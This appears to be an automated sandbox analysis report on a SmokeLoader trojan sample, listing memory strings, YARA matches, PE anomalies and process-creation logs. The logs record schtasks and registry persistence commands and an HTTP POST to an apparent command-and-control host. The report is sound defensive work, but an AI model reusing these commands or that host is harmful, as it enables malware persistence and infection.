mized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 00000014.00000003.338103638.000001C44199E000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 00000014.00000003.338103638.000001C44199E000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"DivX Web Player","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"Facebook Video","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"Chrome PDF Viewer","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"Chrome PDF Plugin","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"Google Earth","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"Google Talk","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"IBMJava*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: m9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)

Source: unknown

HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://atvcampingtrips.com/upload/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: atvcampingtrips.com

Source: unknown

HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49753 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 00000000.00000002.272458883.0000000002530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.332203358.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.272499037.0000000002551000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.336085099.00000000041A1000.00000004.00000001.sdmp, type: MEMORY

Source: 4851.exe, 00000016.00000002.441073596.000000000262A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

PE file contains section with special chars

Show sources

Source: Microsoft[1].exe0.33.dr	Static PE information: section name:
Source: Microsoft[1].exe0.33.dr	Static PE information: section name: \|
Source: Microsoft.exe.33.dr	Static PE information: section name:
Source: Microsoft.exe.33.dr	Static PE information: section name: \|

Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Code function: 0_2_0040F8B0	0_2_0040F8B0
Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Code function: 0_2_0040EAD0	0_2_0040EAD0
Source: C:\Users\user\AppData\Roaming\uwtjrji	Code function: 18_2_0040F8B0	18_2_0040F8B0
Source: C:\Users\user\AppData\Roaming\uwtjrji	Code function: 18_2_0040EAD0	18_2_0040EAD0
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_00408C60	22_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_0040DC11	22_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_00407C3F	22_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_00418CCC	22_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_00406CA0	22_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_004028B0	22_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_0041A4BE	22_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_00418244	22_2_00418244
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_00401650	22_2_00401650
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_00402F20	22_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_004193C4	22_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_00418788	22_2_00418788
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_00402F89	22_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_00402B90	22_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_004073A0	22_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_02A0F0D0	22_2_02A0F0D0
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_06B00E44	22_2_06B00E44
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_06B08F48	22_2_06B08F48
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_06B0C208	22_2_06B0C208
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_06B0C1E8	22_2_06B0C1E8
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Code function: 26_2_03DE074F	26_2_03DE074F
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Code function: 26_2_03DE0760	26_2_03DE0760
Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	Code function: 30_2_02864AC0	30_2_02864AC0
Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	Code function: 30_2_02863B0D	30_2_02863B0D
Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	Code function: 30_2_028628B7	30_2_028628B7
Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	Code function: 30_2_02862797	30_2_02862797
Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	Code function: 30_2_02843410	30_2_02843410
Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	Code function: 30_2_0285F460	30_2_0285F460
Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	Code function: 30_2_02853D97	30_2_02853D97
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_00424870	33_2_00424870
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_004238BD	33_2_004238BD
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_004031C0	33_2_004031C0
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_0041F210	33_2_0041F210
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_00413B47	33_2_00413B47
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_00422667	33_2_00422667
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_0041F76B	33_2_0041F76B
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_02894AC0	33_2_02894AC0
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_02893B0D	33_2_02893B0D
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_028928B7	33_2_028928B7
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_02892797	33_2_02892797
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_02873410	33_2_02873410
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_0288F460	33_2_0288F460
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_02883D97	33_2_02883D97
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 39_2_00424870	39_2_00424870
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 39_2_004238BD	39_2_004238BD
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 39_2_004031C0	39_2_004031C0
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 39_2_0041F210	39_2_0041F210
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 39_2_00413B47	39_2_00413B47
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 39_2_00422547	39_2_00422547
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 39_2_00422667	39_2_00422667
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 39_2_0041F6A8	39_2_0041F6A8

Source: Microsoft[1].exe0.33.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Microsoft.exe.33.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\bd1299733e\

Source: xuTyOmef1g.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	Code function: String function: 02850830 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	Code function: String function: 0284F170 appears 89 times
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: String function: 02880830 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: String function: 0287F170 appears 89 times
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: String function: 00415F3B appears 46 times
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: String function: 004105E0 appears 78 times
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: String function: 0040EF20 appears 181 times

Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Code function: 0_2_00401995 Sleep,NtTerminateProcess,	0_2_00401995
Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Code function: 0_2_004019C0 Sleep,NtTerminateProcess,	0_2_004019C0
Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Code function: 0_2_004019A1 Sleep,NtTerminateProcess,	0_2_004019A1
Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Code function: 0_2_004019AD Sleep,NtTerminateProcess,	0_2_004019AD
Source: C:\Users\user\AppData\Roaming\uwtjrji	Code function: 18_2_00401995 Sleep,NtTerminateProcess,	18_2_00401995
Source: C:\Users\user\AppData\Roaming\uwtjrji	Code function: 18_2_004019C0 Sleep,NtTerminateProcess,	18_2_004019C0
Source: C:\Users\user\AppData\Roaming\uwtjrji	Code function: 18_2_004019A1 Sleep,NtTerminateProcess,	18_2_004019A1
Source: C:\Users\user\AppData\Roaming\uwtjrji	Code function: 18_2_004019AD Sleep,NtTerminateProcess,	18_2_004019AD

Source: Microsoft[1].exe0.33.dr	Static PE information: Section: ZLIB complexity 0.99756567029
Source: Microsoft[1].exe0.33.dr	Static PE information: Section: \| ZLIB complexity 0.999961703431
Source: Microsoft.exe.33.dr	Static PE information: Section: ZLIB complexity 0.99756567029
Source: Microsoft.exe.33.dr	Static PE information: Section: \| ZLIB complexity 0.999961703431

Source: xuTyOmef1g.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\uwtjrji

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@37/45@53/12

Source: C:\Users\user\AppData\Local\Temp\F3D5.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\AppData\Local\Temp\4851.exe

Code function: 22_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,EntryPoint,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,GetEnvironmentStringsW,VariantClear,VariantClear,VariantClear,

22_2_004019F0

Source: xuTyOmef1g.exe

Virustotal: Detection: 37%

Source: C:\Users\user\Desktop\xuTyOmef1g.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\xuTyOmef1g.exe 'C:\Users\user\Desktop\xuTyOmef1g.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Users\user\AppData\Roaming\uwtjrji C:\Users\user\AppData\Roaming\uwtjrji
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4851.exe C:\Users\user\AppData\Local\Temp\4851.exe
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\DB3B.exe C:\Users\user\AppData\Local\Temp\DB3B.exe
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F3D5.exe C:\Users\user\AppData\Local\Temp\F3D5.exe
Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	Process created: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe 'C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe'
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\bd1299733e\
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR 'C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe' /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\bd1299733e\
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Process created: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe 'C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe'
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4851.exe C:\Users\user\AppData\Local\Temp\4851.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	Process created: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe 'C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe'
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\bd1299733e\
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR 'C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe' /F
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Process created: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe 'C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\bd1299733e\

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\4851.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\4851.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\4851.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\4851.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\4851.exe

22_2_004019F0

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6940:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:992:120:WilError_01
